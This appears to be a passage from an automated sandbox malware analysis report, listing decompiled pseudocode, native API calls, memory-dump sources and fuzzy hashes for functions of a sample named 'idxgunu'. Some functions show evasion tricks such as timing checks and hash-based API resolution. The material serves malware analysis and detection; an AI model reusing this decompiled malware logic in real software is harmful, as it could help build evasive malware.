NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8c2af1f04da9e255862acc5baa835ad1e984248b24d21e88d49fdc6d88897418
Instruction ID: 2050b9fffedb920e41d1b2f8bdea77bdb674f9820160c087a2ea780052f335c0
Opcode Fuzzy Hash: 8c2af1f04da9e255862acc5baa835ad1e984248b24d21e88d49fdc6d88897418
Instruction Fuzzy Hash: A701BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248FA1D97251D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0041a36f
0x0041a377
0x0041a3ad
0x0041a3b1

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a54f
0x0041a557
0x0041a579
0x0041a57d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A48C Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A48C(void* __ebx, void* __edx) {
				long _t8;
				void* _t14;

				_t5 =  *0xFFFFFFFFEC8B550F;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t14,  *0xFFFFFFFFEC8B550F, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose( *0xFFFFFFFFEC8B5513); // executed
				return _t8;
			}

0x0041a493
0x0041a496
0x0041a49f
0x0041a4a7
0x0041a4b5
0x0041a4b9

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 141fcef12e090d403854eb609201cb7a049701603f3fb63610599b09421aeb32
Instruction ID: 25d9a5892bfc2e4703fad434ceea688b8674cbeee0cd7d47af1bee99dba1b6f7
Opcode Fuzzy Hash: 141fcef12e090d403854eb609201cb7a049701603f3fb63610599b09421aeb32
Instruction Fuzzy Hash: BBE08C75200110ABD710DB94CC85F973729EF48324F188489FA085B241C130E510CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a493
0x0041a496
0x0041a49f
0x0041a4a7
0x0041a4b5
0x0041a4b9

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01339910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0133991A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7027aed29c9cdf1ccd5d6732b5ebedaf9c71400d93d62a2a6af0887b7c40878f
Instruction ID: 34151ade5806bbf71e8b8819996a3cdbfc9045146a9652c26ad180fc56fd6287
Opcode Fuzzy Hash: 7027aed29c9cdf1ccd5d6732b5ebedaf9c71400d93d62a2a6af0887b7c40878f
Instruction Fuzzy Hash: 1F9002B530100403D540719944047460045A7E0345F51C021A5054594EC6999DD976A9

Uniqueness

Uniqueness Score: -1.00%

Function 01339540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0133954A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4fb4494b0b399ab974913f26bd59a202265437649d1a17ba7346e7699813176a
Instruction ID: a4239461e20a19da72ea31f0318d20d6ed9bb526eac1e83ee1c04c83f864334b
Opcode Fuzzy Hash: 4fb4494b0b399ab974913f26bd59a202265437649d1a17ba7346e7699813176a
Instruction Fuzzy Hash: D2900269311000034505A59907045070086A7E5395351C031F1005590CD6619C656165

Uniqueness

Uniqueness Score: -1.00%

Function 013399A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013399AA

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5d7b36044ea3c25c761be3773f2b37129e41ad55fcf2f4cd833d6689ca544ed6
Instruction ID: 0e956ea85d43c82f80a5588f995596dd662b6d04af8f44d0fe4197390cd454e8
Opcode Fuzzy Hash: 5d7b36044ea3c25c761be3773f2b37129e41ad55fcf2f4cd833d6689ca544ed6
Instruction Fuzzy Hash: 279002A534100443D50061994414B060045E7F1345F51C025E1054594DC659DC56716A

Uniqueness

Uniqueness Score: -1.00%

Function 013395D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013395DA

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89b58bfe3136713396a1cf42420708acfe9a278fd8b3f2f52a8eaa743c69d738
Instruction ID: e0779b9be53de05bd6c35c83ad60546f8398b95f399db055a3614d1e2fda6482
Opcode Fuzzy Hash: 89b58bfe3136713396a1cf42420708acfe9a278fd8b3f2f52a8eaa743c69d738
Instruction Fuzzy Hash: 099002A530200003850571994414616404AA7F0245B51C031E10045D0DC5659C957169

Uniqueness

Uniqueness Score: -1.00%

Function 01339860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0133986A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf55714d0dc0cf5ca5851c6478ee8c5e0e1aa0550d28abee3bb8426c12b0d7d9
Instruction ID: 459d15be89f7e1591502f4652df86cbeaa9056de4fe3426ea1bc8d7cb4947672
Opcode Fuzzy Hash: cf55714d0dc0cf5ca5851c6478ee8c5e0e1aa0550d28abee3bb8426c12b0d7d9
Instruction Fuzzy Hash: 6E90027530100413D511619945047070049A7E0285F91C422A0414598DD6969D56B165

Uniqueness

Uniqueness Score: -1.00%

Function 01339840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0133984A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98fdcb7c1790c7a884b8b898b2ebef58b20ea4365a685ef5584501c6130b3a7c
Instruction ID: 498d9a456eb62590d77414ec8c2776b830935af46f969968e0934e224456c096
Opcode Fuzzy Hash: 98fdcb7c1790c7a884b8b898b2ebef58b20ea4365a685ef5584501c6130b3a7c
Instruction Fuzzy Hash: EE900265342041539945B19944045074046B7F0285791C022A1404990CC566AC5AE665

Uniqueness

Uniqueness Score: -1.00%

Function 013398F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013398FA

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 10ddd393db628231e15cbd5e48bcfd24c2c05dcfe85e40d4fb6140eed502741e
Instruction ID: ecea57b7b2041fe90a6a566cf0a19ef6b7ccf7ccc7d87518d9c7b06b225cb57a
Opcode Fuzzy Hash: 10ddd393db628231e15cbd5e48bcfd24c2c05dcfe85e40d4fb6140eed502741e
Instruction Fuzzy Hash: 0F90026570100503D50171994404616004AA7E0285F91C032A1014595ECA659D96B175

Uniqueness

Uniqueness Score: -1.00%

Function 01339710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0133971A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bc72ba27d36f1075915882c84e86d950a5b4ffcafb6e66a36342dedaf47330c
Instruction ID: 424b9e2b3a9ed752bc6b804e9645aeb81512f7bc1c7f8df4653a301a6a31ec2d
Opcode Fuzzy Hash: 9bc72ba27d36f1075915882c84e86d950a5b4ffcafb6e66a36342dedaf47330c
Instruction Fuzzy Hash: BC90027530100403D50065D954086460045A7F0345F51D021A5014595EC6A59C957175

Uniqueness

Uniqueness Score: -1.00%

Function 013397A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013397AA

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbc19cacbc2ffc9e05c53fc50e46f595c3bf92a9b3b32665b4fdfb8418edd8bb
Instruction ID: 3bc11c8ce82b53e441e205f8cf08f4f94dd1fd027005055b63e3cd914bfad2e6
Opcode Fuzzy Hash: cbc19cacbc2ffc9e05c53fc50e46f595c3bf92a9b3b32665b4fdfb8418edd8bb
Instruction Fuzzy Hash: 6290026530100003D540719954186064045F7F1345F51D021E0404594CD9559C5A6266

Uniqueness

Uniqueness Score: -1.00%

Function 01339780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0133978A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3d22e39244d48c9a1998e2d84add98ede7feb52691a3202a5fe4fecfe01fdae
Instruction ID: d7cfaf868bb7511ed8805e251b376f63972e51b787df444d4f4c6afad56bee8e
Opcode Fuzzy Hash: a3d22e39244d48c9a1998e2d84add98ede7feb52691a3202a5fe4fecfe01fdae
Instruction Fuzzy Hash: A290026D31300003D5807199540860A0045A7E1246F91D425A0005598CC9559C6D6365

Uniqueness

Uniqueness Score: -1.00%

Function 01339A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01339A2A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 866d333203b69580afa2edd99076827b2eb86ea3a0c26f12a4d9cdcf8947f676
Instruction ID: dcbee2efdbe4dd602c9619e563dc6988026ef4ab370ab7f86a8bb77fb33caacf
Opcode Fuzzy Hash: 866d333203b69580afa2edd99076827b2eb86ea3a0c26f12a4d9cdcf8947f676
Instruction Fuzzy Hash: FD90026570100043854071A988449064045BBF1255751C131A0988590DC5999C6966A9

Uniqueness

Uniqueness Score: -1.00%

Function 01339A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01339A0A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb087de4ca1c7aaca168fdb04ced332023fe84f0056f6ba456a4ad97e24c6bc4
Instruction ID: 884874bc3b91629e9553cfa4da00fe35ff54c9024ad536f662d08ab11c33ab0f
Opcode Fuzzy Hash: cb087de4ca1c7aaca168fdb04ced332023fe84f0056f6ba456a4ad97e24c6bc4
Instruction Fuzzy Hash: 3B90027530140403D5006199481470B0045A7E0346F51C021A1154595DC6659C5575B5

Uniqueness

Uniqueness Score: -1.00%

Function 01339660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0133966A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5877af144111bed30209fa11f12fe4c0fcd46a13d467902973bd7246ae5ed23a
Instruction ID: e7f0b817cc9a419807fcdf259c4276eb28cea91bc0147c3b84fa26d6de4cf929
Opcode Fuzzy Hash: 5877af144111bed30209fa11f12fe4c0fcd46a13d467902973bd7246ae5ed23a
Instruction Fuzzy Hash: CF90027530100803D5807199440464A0045A7E1345F91C025A0015694DCA559E5D77E5

Uniqueness

Uniqueness Score: -1.00%

Function 01339A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01339A5A

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5d1e2bbf4ec59a20fb8d0ff68c2d0105a780c22b36adbf72865c4a032d392bbf
Instruction ID: c37ab6398a5506bdc4b34fe4d0d1ab5b5e2b9b4aab2bb4d5f8c293fd9fd76051
Opcode Fuzzy Hash: 5d1e2bbf4ec59a20fb8d0ff68c2d0105a780c22b36adbf72865c4a032d392bbf
Instruction Fuzzy Hash: BD90026531180043D60065A94C14B070045A7E0347F51C125A0144594CC9559C656565

Uniqueness

Uniqueness Score: -1.00%

Function 013396E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013396EA

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9a7a09660d00f0c274c854835de5e0aac51e4a338ba47c35ec54b6c154c124d
Instruction ID: df69e47551c4cad9191ce19d71fe3eee726331cfac70a0d86c217de13437cc2c
Opcode Fuzzy Hash: e9a7a09660d00f0c274c854835de5e0aac51e4a338ba47c35ec54b6c154c124d
Instruction Fuzzy Hash: 8390027530108803D5106199840474A0045A7E0345F55C421A4414698DC6D59C957165

Uniqueness

Uniqueness Score: -1.00%

Function 00409AB0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00409AB0(intOrPtr* _a4) {
				void* _v3;
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t55 = _t54 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t56 = _t55 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t57 = _t56 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t57 = _t57 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_push( &_v840);
						asm("in al, dx");
						_push( &_v24);
						_t33 = E004080E0();
						_t56 = _t57 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409abb
0x00409ac3
0x00409ac5
0x00409aca
0x00409acf
0x00409ae2
0x00409ae7
0x00409af0
0x00409afc
0x00409b0f
0x00409b14
0x00409b17
0x00409b20
0x00409b32
0x00409b37
0x00409b3c
0x00000000
0x00000000
0x00409b3e
0x00409b42
0x00000000
0x00000000
0x00409b44
0x00000000
0x00409b42
0x00409b46
0x00409b49
0x00409b4f
0x00409b51
0x00409b57
0x00409b5a
0x00409b5b
0x00409b5c
0x00409b61
0x00409b64
0x00409b71
0x00409b7c
0x00409b7e
0x00409b84
0x00409b88
0x00409b8b
0x00409b8b
0x00409b92
0x00409b95
0x00409b9a
0x00409ba7
0x00409ad6
0x00409ad6
0x00409ad6

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x0041a647
0x0041a652
0x0041a65d
0x0041a661

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00408308(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t14;
				int _t15;
				long _t23;
				int _t28;
				void* _t31;
				void* _t33;
				void* _t38;

				_t38 = __eflags;
				asm("jecxz 0x57");
				_t31 = _t33;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t27 = _a4 + 0x1c;
				_t14 = E0040ACF0(__ebx, _a4 + 0x1c, _t38, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E50(_t27, _t14, 0, 0, 0xc4e7b6d6);
				_t28 = _t15;
				if(_t28 != 0) {
					_t23 = _a8;
					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t40 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t28(_t23, 0x8003, _t31 + (E0040A480(_t40, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}

0x00408308
0x0040830f
0x00408311
0x0040831f
0x00408323
0x0040832e
0x0040833a
0x0040833e
0x0040834e
0x00408353
0x0040835a
0x0040835d
0x0040836a
0x0040836c
0x0040836e
0x0040838b
0x0040838b
0x0040838d
0x00408392

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 48f1625f06128197ee9c05067f4d4ed4952174e824ffa7518e7d1792578f2363
Instruction ID: 16977d34fbc6432dd6070d8409758cd82b2745fa24eefa0c30c7e2f41e684c27
Opcode Fuzzy Hash: 48f1625f06128197ee9c05067f4d4ed4952174e824ffa7518e7d1792578f2363
Instruction Fuzzy Hash: AD012B319803187BE710A6909C02FEE7A185B40F50F04012DFF04BA1C1E6A8690547EA

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00408310(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E0040ACF0(__ebx, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_t25, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A480(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00408310
0x0040831f
